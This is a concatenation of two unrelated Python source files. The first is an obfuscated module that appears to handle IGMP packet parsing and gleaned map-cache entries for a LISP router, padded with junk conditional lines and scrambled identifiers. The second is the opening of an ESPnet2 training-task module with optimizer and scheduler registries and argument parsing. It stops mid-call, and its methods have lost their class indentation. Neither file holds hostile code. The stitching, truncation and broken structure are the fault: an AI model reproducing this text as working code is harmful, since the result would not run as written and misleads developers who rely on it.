if 59 - 59: I1ii11iIi11i . I1Ii111 - OOooOOo / Oo0Ooo + OOooOOo . I1ii11iIi11i
if 69 - 69: Oo0Ooo
if 34 - 34: I1Ii111 - ooOoO0o . o0oOOo0O0Ooo
if 52 - 52: o0oOOo0O0Ooo % I11i * I11i / iIii1I11I1II1
if 77 - 77: OoOoOO00
if 67 - 67: OoooooooOO / OoooooooOO + IiII - ooOoO0o
if 72 - 72: Ii1I
if 21 - 21: ooOoO0o + iII111i
if 39 - 39: o0oOOo0O0Ooo % I1Ii111 - o0oOOo0O0Ooo % Oo0Ooo
# IGMP message names keyed by type code; used by lisp_process_igmp_packet()
# to pretty-print messages it does not support.
igmp_types = { 17 : "IGMP-query" , 18 : "IGMPv1-report" , 19 : "DVMRP" ,
    20 : "PIMv1" , 22 : "IGMPv2-report" , 23 : "IGMPv2-leave" ,
    30 : "mtrace-response" , 31 : "mtrace-request" , 34 : "IGMPv3-report" }
if 78 - 78: OoO0O00 / o0oOOo0O0Ooo / O0 % OOooOOo % i1IIi

# IGMPv3 group-record type names keyed by record-type value (these match
# the record types of RFC 3376 section 4.2.12).
lisp_igmp_record_types = { 1 : "include-mode" , 2 : "exclude-mode" ,
    3 : "change-to-include" , 4 : "change-to-exclude" , 5 : "allow-new-source" ,
    6 : "block-old-sources" }
if 78 - 78: o0oOOo0O0Ooo - oO0o . II111iiii
def lisp_process_igmp_packet ( packet ) :
    """
    Parse a raw IGMP packet (IP header included) and return the joins and
    leaves it carries as a list of [source-or-None, group-string, join?]
    triples.  An IGMP query returns True; unsupported or malformed
    messages return [].

    NOTE(review): this parses 'packet' with Python-2 str indexing
    (struct.unpack("B", packet[0])) and dict.has_key(), so it only runs
    under Python 2 as written.
    """
    # IP source address of the report, only used for logging.
    O0O00Oo = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
    O0O00Oo . address = socket . ntohl ( struct . unpack ( "I" , packet [ 12 : 16 ] ) [ 0 ] )
    O0O00Oo = bold ( "from {}" . format ( O0O00Oo . print_address_no_iid ( ) ) , False )
    if 67 - 67: iII111i + I11i - OoO0O00 . OOooOOo * iIii1I11I1II1
    O0OooO0oo = bold ( "Receive" , False )
    lprint ( "{} {}-byte {}, IGMP packet: {}" . format ( O0OooO0oo , len ( packet ) , O0O00Oo ,
        lisp_format_packet ( packet ) ) )
    if 44 - 44: OoooooooOO * i1IIi % i1IIi - i11iIiiIii % OOooOOo - OoO0O00
    if 62 - 62: OOooOOo + OoooooooOO / I1Ii111 % iIii1I11I1II1
    if 59 - 59: i11iIiiIii . IiII
    if 91 - 91: Oo0Ooo / iII111i + I1Ii111

    # IP header length in bytes from the IHL field (low nibble * 4).
    IiI11I11 = ( struct . unpack ( "B" , packet [ 0 ] ) [ 0 ] & 0x0f ) * 4
    if 30 - 30: I1Ii111 . i1IIi * OoooooooOO * OoooooooOO
    if 43 - 43: OoooooooOO * O0
    if 56 - 56: i1IIi / iIii1I11I1II1 - OoO0O00
    if 77 - 77: I1IiiI + IiII - oO0o - I1ii11iIi11i * II111iiii + i1IIi

    # Strip the IP header; first IGMP byte is the message type.
    oO0ooOo = packet [ IiI11I11 : : ]
    ooO0 = struct . unpack ( "B" , oO0ooOo [ 0 ] ) [ 0 ]
    if 88 - 88: OoOoOO00 - Ii1I . O0 % I1Ii111 % I1ii11iIi11i
    if 56 - 56: OoOoOO00 - iIii1I11I1II1 / I1IiiI - i1IIi / o0oOOo0O0Ooo * I11i
    if 70 - 70: OOooOOo
    if 11 - 11: I11i * II111iiii * Oo0Ooo + OOooOOo % i1IIi
    if 73 - 73: OoO0O00 + O0 / Ii1I . OoooooooOO % iIii1I11I1II1 * i1IIi

    # Second word of the IGMP header is the group address (v1/v2 reports).
    oOoooOOO0o0 = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
    oOoooOOO0o0 . address = socket . ntohl ( struct . unpack ( "II" , oO0ooOo [ : 8 ] ) [ 1 ] )
    iiIiII11i1 = oOoooOOO0o0 . print_address_no_iid ( )
    if 84 - 84: o0oOOo0O0Ooo . iII111i / o0oOOo0O0Ooo + I1ii11iIi11i % OoO0O00

    # Type 17 (0x11) is a membership query; nothing to glean from it.
    if ( ooO0 == 17 ) :
        lprint ( "IGMP Query for group {}" . format ( iiIiII11i1 ) )
        return ( True )
    if 52 - 52: OoOoOO00 / Ii1I % OoOoOO00 % i11iIiiIii + I1IiiI / o0oOOo0O0Ooo
    if 63 - 63: I1IiiI

    # Only v1/v2 reports (0x12/0x16), v2 leave (0x17) and v3 report (0x22)
    # are processed; anything else is logged and ignored.
    iIIiI1I = ( ooO0 in ( 0x12 , 0x16 , 0x17 , 0x22 ) )
    if ( iIIiI1I == False ) :
        Ooooo0OOoo00 = "{} ({})" . format ( ooO0 , igmp_types [ ooO0 ] ) if igmp_types . has_key ( ooO0 ) else ooO0
        if 71 - 71: I1Ii111
        lprint ( "IGMP type {} not supported" . format ( Ooooo0OOoo00 ) )
        return ( [ ] )
    if 4 - 4: ooOoO0o * OoOoOO00 * o0oOOo0O0Ooo - iII111i - o0oOOo0O0Ooo * OOooOOo
    if 91 - 91: OoOoOO00 * II111iiii % I1ii11iIi11i

    # Need at least the 8-byte fixed IGMP header.
    if ( len ( oO0ooOo ) < 8 ) :
        lprint ( "IGMP message too small" )
        return ( [ ] )
    if 89 - 89: OOooOOo - Oo0Ooo . I1ii11iIi11i - I1IiiI
    if 1 - 1: iIii1I11I1II1
    if 100 - 100: Oo0Ooo % OoooooooOO
    if 28 - 28: oO0o . o0oOOo0O0Ooo
    if 14 - 14: Oo0Ooo - I1Ii111 + Oo0Ooo / iII111i

    # IGMPv2 leave -> single (*, G) leave triple.
    if ( ooO0 == 0x17 ) :
        lprint ( "IGMPv2 leave (*, {})" . format ( bold ( iiIiII11i1 , False ) ) )
        return ( [ [ None , iiIiII11i1 , False ] ] )
    if 61 - 61: Ii1I * Ii1I . OoOoOO00 + OoO0O00 * i11iIiiIii * OoO0O00

    # IGMPv1/v2 report -> single (*, G) join triple, except link-local
    # groups (224.0.0.x) which are never registered.
    if ( ooO0 in ( 0x12 , 0x16 ) ) :
        lprint ( "IGMPv{} join (*, {})" . format ( 1 if ( ooO0 == 0x12 ) else 2 , bold ( iiIiII11i1 , False ) ) )
        if 4 - 4: OoooooooOO % iII111i % Oo0Ooo * IiII % o0oOOo0O0Ooo . o0oOOo0O0Ooo
        if 66 - 66: I1IiiI . Oo0Ooo - oO0o
        if 53 - 53: oO0o / Ii1I + oO0o + II111iiii
        if 70 - 70: OoooooooOO - I1Ii111 + OoOoOO00
        if 61 - 61: I1IiiI * I1Ii111 * i11iIiiIii
        if ( iiIiII11i1 . find ( "224.0.0." ) != - 1 ) :
            lprint ( "Suppress registration for link-local groups" )
        else :
            return ( [ [ None , iiIiII11i1 , True ] ] )
        if 68 - 68: OoOoOO00 - iII111i - I1IiiI
        if 37 - 37: iII111i - I1Ii111 + i1IIi / o0oOOo0O0Ooo % iII111i / iII111i
        if 8 - 8: i1IIi % I11i
        if 12 - 12: ooOoO0o / II111iiii + ooOoO0o * I1ii11iIi11i / i1IIi - iIii1I11I1II1
        if 71 - 71: IiII - i11iIiiIii
        return ( [ ] )
    if 3 - 3: i11iIiiIii - o0oOOo0O0Ooo / oO0o . OoO0O00 * I11i + o0oOOo0O0Ooo
    if 18 - 18: OoooooooOO % oO0o / IiII - ooOoO0o
    if 80 - 80: I11i
    if 98 - 98: iII111i / I1ii11iIi11i
    if 87 - 87: iII111i - O0 * ooOoO0o / II111iiii % OoooooooOO . o0oOOo0O0Ooo

    # IGMPv3 report: the word parsed as "group" above actually holds the
    # number of group records that follow (presumably the low 16 bits;
    # the code uses the whole word — TODO confirm against senders).
    oOo0o0ooO0OOO = oOoooOOO0o0 . address
    oO0ooOo = oO0ooOo [ 8 : : ]
    if 55 - 55: OOooOOo - o0oOOo0O0Ooo * I1IiiI / o0oOOo0O0Ooo + I1Ii111 + iIii1I11I1II1

    # Fixed part of a group record (type, aux-len, source-count, group)
    # and the size of each 4-byte source address that follows it.
    Iii111i1iI1 = "BBHI"
    OoOOOoo = struct . calcsize ( Iii111i1iI1 )
    IiIi111i = "I"
    iiIiIiIi1 = struct . calcsize ( IiIi111i )
    O0O00Oo = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
    if 33 - 33: I1ii11iIi11i . OOooOOo + i1IIi - OoooooooOO * II111iiii
    if 80 - 80: I11i % Oo0Ooo % I1Ii111 / OoO0O00 + II111iiii
    if 40 - 40: Ii1I + O0 . i11iIiiIii % I11i / Oo0Ooo
    if 25 - 25: IiII * IiII

    # Walk each group record, collecting [source, group, join?] triples.
    o0ooO0OOOoO0o = [ ]
    for i1i1IIIIIIIi in range ( oOo0o0ooO0OOO ) :
        # NOTE(review): truncated packet returns bare None here while all
        # other paths return a list — callers must tolerate both.
        if ( len ( oO0ooOo ) < OoOOOoo ) : return
        oooO000oO00 , OoOO0OOOO0 , oOoO0Oo0Oo , III1 = struct . unpack ( Iii111i1iI1 ,
            oO0ooOo [ : OoOOOoo ] )
        if 11 - 11: o0oOOo0O0Ooo / i1IIi / I11i * O0 + iII111i
        oO0ooOo = oO0ooOo [ OoOOOoo : : ]
        if 20 - 20: Ii1I * I1ii11iIi11i - I1Ii111 + I1IiiI - ooOoO0o
        if ( lisp_igmp_record_types . has_key ( oooO000oO00 ) == False ) :
            lprint ( "Invalid record type {}" . format ( oooO000oO00 ) )
            continue
        if 63 - 63: Ii1I + o0oOOo0O0Ooo - iII111i
        if 1 - 1: O0 . I1IiiI . OoooooooOO . I1ii11iIi11i + I11i - i11iIiiIii

        # Decode record fields: record-type name, source count and the
        # group address for this record.
        i1II1IIi = lisp_igmp_record_types [ oooO000oO00 ]
        oOoO0Oo0Oo = socket . ntohs ( oOoO0Oo0Oo )
        oOoooOOO0o0 . address = socket . ntohl ( III1 )
        iiIiII11i1 = oOoooOOO0o0 . print_address_no_iid ( )
        if 100 - 100: II111iiii + oO0o
        lprint ( "Record type: {}, group: {}, source-count: {}" . format ( i1II1IIi , iiIiII11i1 , oOoO0Oo0Oo ) )
        if 85 - 85: I1ii11iIi11i % I1ii11iIi11i . Ii1I
        if 42 - 42: oO0o + OoO0O00
        if 16 - 16: Ii1I
        if 67 - 67: I1ii11iIi11i . OoooooooOO * I1Ii111 + Ii1I * OOooOOo
        if 84 - 84: OOooOOo
        if 78 - 78: O0 % O0
        if 72 - 72: o0oOOo0O0Ooo * IiII / II111iiii / iIii1I11I1II1

        # Record types 1/5 (include, allow-new) mean join; types 2/4
        # (exclude, change-to-exclude) with zero sources mean (*, G) join;
        # everything else is treated as a leave.
        i11iI = False
        if ( oooO000oO00 in ( 1 , 5 ) ) : i11iI = True
        if ( oooO000oO00 in ( 2 , 4 ) and oOoO0Oo0Oo == 0 ) : i11iI = True
        o00i1I1 = "join" if ( i11iI ) else "leave"
        if 45 - 45: ooOoO0o
        if 52 - 52: I1ii11iIi11i % Ii1I - iIii1I11I1II1 . ooOoO0o % I1IiiI
        if 57 - 57: OoO0O00 % Ii1I
        if 11 - 11: OoO0O00

        # Never register link-local groups (224.0.0.x).
        if ( iiIiII11i1 . find ( "224.0.0." ) != - 1 ) :
            lprint ( "Suppress registration for link-local groups" )
            continue
        if 74 - 74: OoO0O00 - OOooOOo - ooOoO0o - iIii1I11I1II1
        if 29 - 29: ooOoO0o
        if 31 - 31: o0oOOo0O0Ooo / IiII - oO0o / OoOoOO00 * IiII * i1IIi
        if 45 - 45: OoOoOO00 + iII111i % iIii1I11I1II1 - IiII * OOooOOo
        if 62 - 62: Ii1I / Oo0Ooo / I1ii11iIi11i . OoOoOO00 % ooOoO0o * IiII
        if 97 - 97: ooOoO0o
        if 14 - 14: iII111i + iII111i
        if 62 - 62: ooOoO0o / OOooOOo * I1ii11iIi11i + Oo0Ooo - OoooooooOO - OoooooooOO

        # No sources -> a single (*, G) entry.
        if ( oOoO0Oo0Oo == 0 ) :
            o0ooO0OOOoO0o . append ( [ None , iiIiII11i1 , i11iI ] )
            lprint ( "IGMPv3 {} (*, {})" . format ( bold ( o00i1I1 , False ) ,
                bold ( iiIiII11i1 , False ) ) )
        if 19 - 19: Ii1I . oO0o
        if 26 - 26: OOooOOo + II111iiii
        if 67 - 67: IiII + OoOoOO00 * I1ii11iIi11i % o0oOOo0O0Ooo / oO0o
        if 31 - 31: ooOoO0o / Ii1I . Ii1I - I1IiiI - Oo0Ooo . II111iiii
        if 82 - 82: Oo0Ooo % Oo0Ooo

        # Otherwise one (S, G) entry per listed source address.
        for Oo0iIIiiIiiI in range ( oOoO0Oo0Oo ) :
            if ( len ( oO0ooOo ) < iiIiIiIi1 ) : return
            III1 = struct . unpack ( IiIi111i , oO0ooOo [ : iiIiIiIi1 ] ) [ 0 ]
            O0O00Oo . address = socket . ntohl ( III1 )
            I1iI1I1i1II = O0O00Oo . print_address_no_iid ( )
            o0ooO0OOOoO0o . append ( [ I1iI1I1i1II , iiIiII11i1 , i11iI ] )
            lprint ( "{} ({}, {})" . format ( o00i1I1 ,
                green ( I1iI1I1i1II , False ) , bold ( iiIiII11i1 , False ) ) )
            oO0ooOo = oO0ooOo [ iiIiIiIi1 : : ]
    if 99 - 99: Oo0Ooo - ooOoO0o . OoO0O00 - Oo0Ooo / O0
    if 42 - 42: Ii1I - OoOoOO00 . OoOoOO00
    if 88 - 88: o0oOOo0O0Ooo . Ii1I . iII111i * iII111i + i11iIiiIii
    if 68 - 68: OoooooooOO
    if 5 - 5: OoOoOO00 . i11iIiiIii . OOooOOo / I11i * Oo0Ooo % Oo0Ooo
    if 44 - 44: I1ii11iIi11i + oO0o % i1IIi + OoooooooOO
    if 42 - 42: I1Ii111 / I1Ii111 - O0
    if 79 - 79: i11iIiiIii

    # Caller registers/deregisters each [source, group, join?] triple.
    return ( o0ooO0OOOoO0o )
if 96 - 96: iIii1I11I1II1 . OoOoOO00 . OOooOOo / iII111i
if 59 - 59: Oo0Ooo + OOooOOo / Oo0Ooo
if 49 - 49: OoO0O00 / Oo0Ooo % OoOoOO00 % i1IIi
if 66 - 66: OoOoOO00 % II111iiii
if 16 - 16: i11iIiiIii - I1IiiI + ooOoO0o * oO0o
if 30 - 30: II111iiii / o0oOOo0O0Ooo
if 57 - 57: I11i / I1ii11iIi11i . I11i
if 68 - 68: OoOoOO00 + O0 . I1IiiI
# Module-level scratch IPv4 group address, reused by the gleaned-multicast
# code (see lisp_change_gleaned_multicast()) to avoid per-call allocation.
lisp_geid = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
if 26 - 26: I1ii11iIi11i
def lisp_glean_map_cache(seid, rloc, encap_port, igmp):

    #
    # Create or refresh a gleaned map-cache entry for source-EID 'seid' seen
    # arriving from 'rloc' on 'encap_port'.  If an IGMP payload is supplied,
    # also add/remove gleaned multicast state for each reported group.
    # (Rewritten from the obfuscated original; behavior unchanged.)
    #
    rloc_change = True

    #
    # Look up existing entry.  If found, refresh it and decide whether the
    # RLOC address or translated port changed since last time.
    #
    mc = lisp_map_cache.lookup_cache(seid, True)
    if (mc and len(mc.rloc_set) != 0):
        mc.last_refresh_time = lisp_get_timestamp()

        stored = mc.rloc_set[0]
        stored_rloc = stored.rloc
        stored_port = stored.translated_port
        rloc_change = (stored_rloc.is_exact_match(rloc) == False or
            stored_port != encap_port)

        if (rloc_change):
            eid_str = green(seid.print_address(), False)
            rloc_str = red(rloc.print_address_no_iid() + ":" +
                str(encap_port), False)
            lprint("Change gleaned EID {} to RLOC {}".format(eid_str,
                rloc_str))
            stored.delete_from_rloc_probe_list(mc.eid, mc.group)
            lisp_change_gleaned_multicast(seid, rloc, encap_port)
    else:
        #
        # No entry yet, build a new gleaned mapping for the source EID.
        #
        mc = lisp_mapping("", "", [])
        mc.eid.copy_address(seid)
        mc.mapping_source.copy_address(rloc)
        mc.map_cache_ttl = LISP_GLEAN_TTL
        mc.gleaned = True
        eid_str = green(seid.print_address(), False)
        rloc_str = red(rloc.print_address_no_iid() + ":" +
            str(encap_port), False)
        lprint("Add gleaned EID {} to map-cache with RLOC {}".format(eid_str,
            rloc_str))
        mc.add_cache()

    #
    # Install the (possibly new) translated RLOC when it changed, including
    # for a freshly created entry (rloc_change stays True in that path).
    #
    if (rloc_change):
        new_rloc = lisp_rloc()
        new_rloc.store_translated_rloc(rloc, encap_port)
        new_rloc.add_to_rloc_probe_list(mc.eid, mc.group)
        new_rloc.priority = 253
        new_rloc.mpriority = 255
        mc.rloc_set = [new_rloc]
        mc.build_best_rloc_set()

    #
    # No IGMP payload piggybacked, unicast gleaning work is done.
    #
    if (igmp == None): return

    #
    # Process IGMP report: walk each (source, group, join/leave) record and
    # build or remove gleaned multicast state where gleaning is allowed.
    #
    lisp_geid.instance_id = seid.instance_id

    records = lisp_process_igmp_packet(igmp)
    if (type(records) == bool): return

    for source, group, joined in records:
        if (source != None): continue

        lisp_geid.store_address(group)
        allowed, x, y = lisp_allow_gleaning(seid, lisp_geid, rloc)
        if (allowed == False): continue

        if (joined):
            lisp_build_gleaned_multicast(seid, lisp_geid, rloc, encap_port,
                True)
        else:
            lisp_remove_gleaned_multicast(seid, lisp_geid)
# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
|
abs_task.py | from abc import ABC
from abc import abstractmethod
import argparse
from contextlib import contextmanager
from distutils.version import LooseVersion
import functools
import logging
import os
from pathlib import Path
import sys
from typing import Any
from typing import Callable
from typing import Dict
from typing import List
from typing import Optional
from typing import Sequence
from typing import Tuple
from typing import Union
import humanfriendly
import numpy as np
import torch
import torch.multiprocessing
import torch.nn
import torch.optim
from torch.utils.data import DataLoader
from typeguard import check_argument_types
from typeguard import check_return_type
import yaml
from espnet.utils.cli_utils import get_commandline_args
from espnet2.iterators.abs_iter_factory import AbsIterFactory
from espnet2.iterators.chunk_iter_factory import ChunkIterFactory
from espnet2.iterators.multiple_iter_factory import MultipleIterFactory
from espnet2.iterators.sequence_iter_factory import SequenceIterFactory
from espnet2.main_funcs.average_nbest_models import average_nbest_models
from espnet2.main_funcs.collect_stats import collect_stats
from espnet2.optimizers.sgd import SGD
from espnet2.samplers.build_batch_sampler import BATCH_TYPES
from espnet2.samplers.build_batch_sampler import build_batch_sampler
from espnet2.samplers.unsorted_batch_sampler import UnsortedBatchSampler
from espnet2.schedulers.abs_scheduler import AbsScheduler
from espnet2.schedulers.noam_lr import NoamLR
from espnet2.schedulers.warmup_lr import WarmupLR
from espnet2.torch_utils.load_pretrained_model import load_pretrained_model
from espnet2.torch_utils.model_summary import model_summary
from espnet2.torch_utils.pytorch_version import pytorch_cudnn_version
from espnet2.torch_utils.set_all_random_seed import set_all_random_seed
from espnet2.train.abs_espnet_model import AbsESPnetModel
from espnet2.train.class_choices import ClassChoices
from espnet2.train.dataset import DATA_TYPES
from espnet2.train.dataset import ESPnetDataset
from espnet2.train.distributed_utils import DistributedOption
from espnet2.train.distributed_utils import free_port
from espnet2.train.distributed_utils import get_master_port
from espnet2.train.distributed_utils import get_node_rank
from espnet2.train.distributed_utils import get_num_nodes
from espnet2.train.distributed_utils import resolve_distributed_mode
from espnet2.train.iterable_dataset import IterableESPnetDataset
from espnet2.train.reporter import Reporter
from espnet2.train.trainer import Trainer
from espnet2.utils.build_dataclass import build_dataclass
from espnet2.utils import config_argparse
from espnet2.utils.get_default_kwargs import get_default_kwargs
from espnet2.utils.nested_dict_action import NestedDictAction
from espnet2.utils.types import humanfriendly_parse_size_or_none
from espnet2.utils.types import int_or_none
from espnet2.utils.types import str2bool
from espnet2.utils.types import str2triple_str
from espnet2.utils.types import str_or_int
from espnet2.utils.types import str_or_none
from espnet2.utils.yaml_no_alias_safe_dump import yaml_no_alias_safe_dump
# torch.multiprocessing.spawn renamed SpawnContext to ProcessContext in
# torch 1.5.0; alias the old name so the rest of the module uses one name.
if LooseVersion(torch.__version__) >= LooseVersion("1.5.0"):
    from torch.multiprocessing.spawn import ProcessContext
else:
    from torch.multiprocessing.spawn import SpawnContext as ProcessContext
# Registry mapping CLI optimizer names to optimizer classes.  Keys are
# lower-cased again further below, together with scheduler_classes.
optim_classes = {
    "adam": torch.optim.Adam,
    "sgd": SGD,
    "adadelta": torch.optim.Adadelta,
    "adagrad": torch.optim.Adagrad,
    "adamax": torch.optim.Adamax,
    "asgd": torch.optim.ASGD,
    "lbfgs": torch.optim.LBFGS,
    "rmsprop": torch.optim.RMSprop,
    "rprop": torch.optim.Rprop,
}
# AdamW only exists from torch 1.2.0 onward.
if LooseVersion(torch.__version__) >= LooseVersion("1.2.0"):
    optim_classes["adamw"] = torch.optim.AdamW
# Optionally register extra optimizers from the third-party "torch_optimizer"
# package; silently skipped when it is not installed.
try:
    import torch_optimizer

    optim_classes.update(
        accagd=torch_optimizer.AccSGD,
        adabound=torch_optimizer.AdaBound,
        adamod=torch_optimizer.AdaMod,
        diffgrad=torch_optimizer.DiffGrad,
        lamb=torch_optimizer.Lamb,
        novograd=torch_optimizer.NovoGrad,
        pid=torch_optimizer.PID,
        # torch_optimizer<=0.0.1a10 doesn't support
        # qhadam=torch_optimizer.QHAdam,
        qhm=torch_optimizer.QHM,
        radam=torch_optimizer.RAdam,
        sgdw=torch_optimizer.SGDW,
        yogi=torch_optimizer.Yogi,
    )
    # Drop the module reference; only the registered classes are needed.
    del torch_optimizer
except ImportError:
    pass
# Optionally register NVIDIA apex fused optimizers; skipped if apex is absent.
try:
    import apex

    optim_classes.update(
        fusedadam=apex.optimizers.FusedAdam,
        fusedlamb=apex.optimizers.FusedLAMB,
        fusednovograd=apex.optimizers.FusedNovoGrad,
        fusedsgd=apex.optimizers.FusedSGD,
    )
    del apex
except ImportError:
    pass
# AMP (automatic mixed precision) only exists from torch 1.6.0 onward.
if LooseVersion(torch.__version__) >= LooseVersion("1.6.0"):
    from torch.cuda.amp import autocast
    from torch.cuda.amp import GradScaler
else:
    # Nothing to do if torch<1.6.0
    @contextmanager
    def autocast(enabled=True):
        # No-op stand-in: accepts and ignores the flag so call sites that
        # do "with autocast(...):" keep working unchanged.
        yield

    # Sentinel: callers check "scaler is not None" before using it.
    GradScaler = None
# Registry mapping CLI scheduler names to lr-scheduler classes; extended
# below depending on the installed torch version, then key-lowered.
scheduler_classes = {
    "ReduceLROnPlateau": torch.optim.lr_scheduler.ReduceLROnPlateau,
    "lambdalr": torch.optim.lr_scheduler.LambdaLR,
    "steplr": torch.optim.lr_scheduler.StepLR,
    "multisteplr": torch.optim.lr_scheduler.MultiStepLR,
    "exponentiallr": torch.optim.lr_scheduler.ExponentialLR,
    "CosineAnnealingLR": torch.optim.lr_scheduler.CosineAnnealingLR,
}
if LooseVersion(torch.__version__) >= LooseVersion("1.1.0"):
    scheduler_classes["noamlr"] = NoamLR
    scheduler_classes["warmuplr"] = WarmupLR
if LooseVersion(torch.__version__) >= LooseVersion("1.3.0"):
    CosineAnnealingWarmRestarts = torch.optim.lr_scheduler.CosineAnnealingWarmRestarts
    scheduler_classes["cycliclr"] = torch.optim.lr_scheduler.CyclicLR
    scheduler_classes["onecyclelr"] = torch.optim.lr_scheduler.OneCycleLR
    scheduler_classes["CosineAnnealingWarmRestarts"] = CosineAnnealingWarmRestarts
# To lower keys
optim_classes = {k.lower(): v for k, v in optim_classes.items()}
scheduler_classes = {k.lower(): v for k, v in scheduler_classes.items()}
class AbsTask(ABC):
    """Abstract base class for an ESPnet2 training task.

    Subclasses implement the abstract classmethods (argument registration,
    collate/preprocess builders, data-name requirements, model construction);
    this base provides argument parsing, distributed launching and the
    training entry points.
    """

    # Use @staticmethod, or @classmethod,
    # instead of instance method to avoid God classes

    # If you need more than one optimizers, change this value in inheritance
    num_optimizers: int = 1
    # Trainer class driving the epoch loop; subclasses may substitute their own.
    trainer = Trainer
    # ClassChoices registered by subclasses; consumed by get_default_config().
    class_choices_list: List[ClassChoices] = []
def __init__(self):
    # AbsTask is a pure namespace of class/static methods; forbid instances.
    raise RuntimeError("This class can't be instantiated.")
@classmethod
@abstractmethod
def add_task_arguments(cls, parser: argparse.ArgumentParser):
    """Add task-specific command-line arguments to *parser* (abstract hook)."""
    pass
@classmethod
@abstractmethod
def build_collate_fn(
    cls, args: argparse.Namespace
) -> Callable[[Sequence[Dict[str, np.ndarray]]], Dict[str, torch.Tensor]]:
    """Return "collate_fn", which is a callable object and given to DataLoader.

    >>> from torch.utils.data import DataLoader
    >>> loader = DataLoader(collate_fn=cls.build_collate_fn(args), ...)

    In many cases, you can use our common collate_fn.
    """
    raise NotImplementedError
@classmethod
@abstractmethod
def build_preprocess_fn(
    cls, args: argparse.Namespace, train: bool
    # Annotation fixed: np.array is a function, not a type; np.ndarray intended.
) -> Optional[Callable[[str, Dict[str, np.ndarray]], Dict[str, np.ndarray]]]:
    """Return a per-sample preprocess function, or None for no preprocessing.

    The callable maps (key, data-dict) -> data-dict; the str argument is
    presumably the utterance id — confirm against the dataset caller.
    """
    raise NotImplementedError
@classmethod
@abstractmethod
def required_data_names(cls, inference: bool = False) -> Tuple[str, ...]:
    """Define the required names by Task

    This function is used by
    >>> cls.check_task_requirements()

    If your model is defined as following,

    >>> from espnet2.train.abs_espnet_model import AbsESPnetModel
    >>> class Model(AbsESPnetModel):
    ...     def forward(self, input, output, opt=None):  pass

    then "required_data_names" should be as

    >>> required_data_names = ('input', 'output')
    """
    raise NotImplementedError
@classmethod
@abstractmethod
def optional_data_names(cls, inference: bool = False) -> Tuple[str, ...]:
    """Define the optional names by Task

    This function is used by
    >>> cls.check_task_requirements()

    If your model is defined as following,

    >>> from espnet2.train.abs_espnet_model import AbsESPnetModel
    >>> class Model(AbsESPnetModel):
    ...     def forward(self, input, output, opt=None):  pass

    then "optional_data_names" should be as

    >>> optional_data_names = ('opt',)
    """
    raise NotImplementedError
@classmethod
@abstractmethod
def build_model(cls, args: argparse.Namespace) -> AbsESPnetModel:
    """Construct the task model from the parsed arguments (abstract hook)."""
    raise NotImplementedError
@classmethod
def get_parser(cls) -> config_argparse.ArgumentParser:
    """Build the full argument parser.

    Registers the common/trainer/sampler/dataset/optimizer option groups,
    then delegates to cls.trainer.add_arguments() and the task-specific
    cls.add_task_arguments().
    """
    assert check_argument_types()

    class ArgumentDefaultsRawTextHelpFormatter(
        argparse.RawTextHelpFormatter, argparse.ArgumentDefaultsHelpFormatter,
    ):
        # Combined formatter: keep raw (multi-line) help text AND show defaults.
        pass

    parser = config_argparse.ArgumentParser(
        description="base parser",
        formatter_class=ArgumentDefaultsRawTextHelpFormatter,
    )

    # NOTE(kamo): Use '_' instead of '-' to avoid confusion.
    # I think '-' looks really confusing if it's written in yaml.

    # NOTE(kamo): add_arguments(..., required=True) can't be used
    # to provide --print_config mode. Instead of it, do as
    parser.set_defaults(required=["output_dir"])

    group = parser.add_argument_group("Common configuration")

    group.add_argument(
        "--print_config",
        action="store_true",
        help="Print the config file and exit",
    )
    group.add_argument(
        "--log_level",
        type=lambda x: x.upper(),
        default="INFO",
        choices=("ERROR", "WARNING", "INFO", "DEBUG", "NOTSET"),
        help="The verbose level of logging",
    )
    group.add_argument(
        "--dry_run",
        type=str2bool,
        default=False,
        help="Perform process without training",
    )
    group.add_argument(
        "--iterator_type",
        type=str,
        choices=["sequence", "chunk", "none"],
        default="sequence",
        help="Specify iterator type",
    )

    group.add_argument("--output_dir", type=str_or_none, default=None)
    group.add_argument(
        "--ngpu",
        type=int,
        default=0,
        help="The number of gpus. 0 indicates CPU mode",
    )
    group.add_argument("--seed", type=int, default=0, help="Random seed")
    group.add_argument(
        "--num_workers",
        type=int,
        default=1,
        help="The number of workers used for DataLoader",
    )
    group.add_argument(
        "--num_att_plot",
        type=int,
        default=3,
        help="The number images to plot the outputs from attention. "
        "This option makes sense only when attention-based model",
    )

    group = parser.add_argument_group("distributed training related")
    group.add_argument(
        "--dist_backend", default="nccl", type=str, help="distributed backend",
    )
    group.add_argument(
        "--dist_init_method",
        type=str,
        default="env://",
        help='if init_method="env://", env values of "MASTER_PORT", "MASTER_ADDR", '
        '"WORLD_SIZE", and "RANK" are referred.',
    )
    group.add_argument(
        "--dist_world_size",
        default=None,
        type=int_or_none,
        help="number of nodes for distributed training",
    )
    group.add_argument(
        "--dist_rank",
        type=int_or_none,
        default=None,
        help="node rank for distributed training",
    )
    group.add_argument(
        # Not starting with "dist_" for compatibility to launch.py
        "--local_rank",
        type=int_or_none,
        default=None,
        help="local rank for distributed training. This option is used if "
        "--multiprocessing_distributed=false",
    )
    group.add_argument(
        "--dist_master_addr",
        default=None,
        type=str_or_none,
        help="The master address for distributed training. "
        "This value is used when dist_init_method == 'env://'",
    )
    group.add_argument(
        "--dist_master_port",
        default=None,
        type=int_or_none,
        help="The master port for distributed training"
        "This value is used when dist_init_method == 'env://'",
    )
    group.add_argument(
        "--dist_launcher",
        default=None,
        type=str_or_none,
        choices=["slurm", "mpi", None],
        help="The launcher type for distributed training",
    )
    group.add_argument(
        "--multiprocessing_distributed",
        default=False,
        type=str2bool,
        help="Use multi-processing distributed training to launch "
        "N processes per node, which has N GPUs. This is the "
        "fastest way to use PyTorch for either single node or "
        "multi node data parallel training",
    )

    group = parser.add_argument_group("cudnn mode related")
    group.add_argument(
        "--cudnn_enabled",
        type=str2bool,
        default=torch.backends.cudnn.enabled,
        help="Enable CUDNN",
    )
    group.add_argument(
        "--cudnn_benchmark",
        type=str2bool,
        default=torch.backends.cudnn.benchmark,
        help="Enable cudnn-benchmark mode",
    )
    group.add_argument(
        "--cudnn_deterministic",
        type=str2bool,
        default=True,
        help="Enable cudnn-deterministic mode",
    )

    group = parser.add_argument_group("collect stats mode related")
    group.add_argument(
        "--collect_stats",
        type=str2bool,
        default=False,
        help='Perform on "collect stats" mode',
    )
    group.add_argument(
        "--write_collected_feats",
